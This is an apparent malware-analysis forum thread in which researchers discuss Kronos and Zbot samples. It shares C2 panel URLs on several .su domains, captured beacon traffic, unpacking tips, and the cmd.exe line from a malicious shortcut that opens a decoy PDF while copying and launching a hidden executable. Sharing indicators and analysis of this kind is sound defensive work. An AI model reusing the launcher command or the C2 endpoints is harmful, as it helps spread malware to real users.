A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #25079  by Kafeine
 Tue Jan 27, 2015 6:57 pm
A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
You do not have the required permissions to view the files attached to this post.
 #27311  by pwnslinger
 Wed Nov 25, 2015 6:50 pm
Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
You do not have the required permissions to view the files attached to this post.
 #27316  by comak
 Thu Nov 26, 2015 11:14 am
This is Kronos,
Code: Select all
http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
cheers,
mak
 #27317  by EP_X0FF
 Thu Nov 26, 2015 11:33 am
pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
You do not have the required permissions to view the files attached to this post.
 #27343  by henices
 Thu Dec 03, 2015 2:13 am
Kafeine wrote:A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
Code: Select all
POST /krpanel/connect.php HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) 
Host: bitcoind.su 
Content-Length: 74 
Cache-Control: no-cache  

WzW,c`cfgcgzcozccazedzeefdfdb*W
attachment is the report.
You do not have the required permissions to view the files attached to this post.
 #27350  by pwnslinger
 Thu Dec 03, 2015 8:07 pm
EP_X0FF wrote:
pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
Thanks EP. ;)

after dumping second stage (explorer.exe) (change EP with PUSH/RET) using EBFE method for attaching using ollydbg.
i dunno why when i wanna set toggle bp on code, olly can't and run (memry regions are RWC!)
then i used f4 (run till selection) and hw bp.
but when call SYSENTER... i can't take control back to myself.
You do not have the required permissions to view the files attached to this post.
 #27859  by pwnslinger
 Fri Feb 12, 2016 10:27 am
i got another variant of Zbot on my system today.
.rsrc section is base64 encoded. first i thought about Ranbyus banking trojan.
also a shortcut created for running malware with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

export table contains callback function. i checked it by Ida and i didn't see any useful call.
where i should start?


sample attached.
You do not have the required permissions to view the files attached to this post.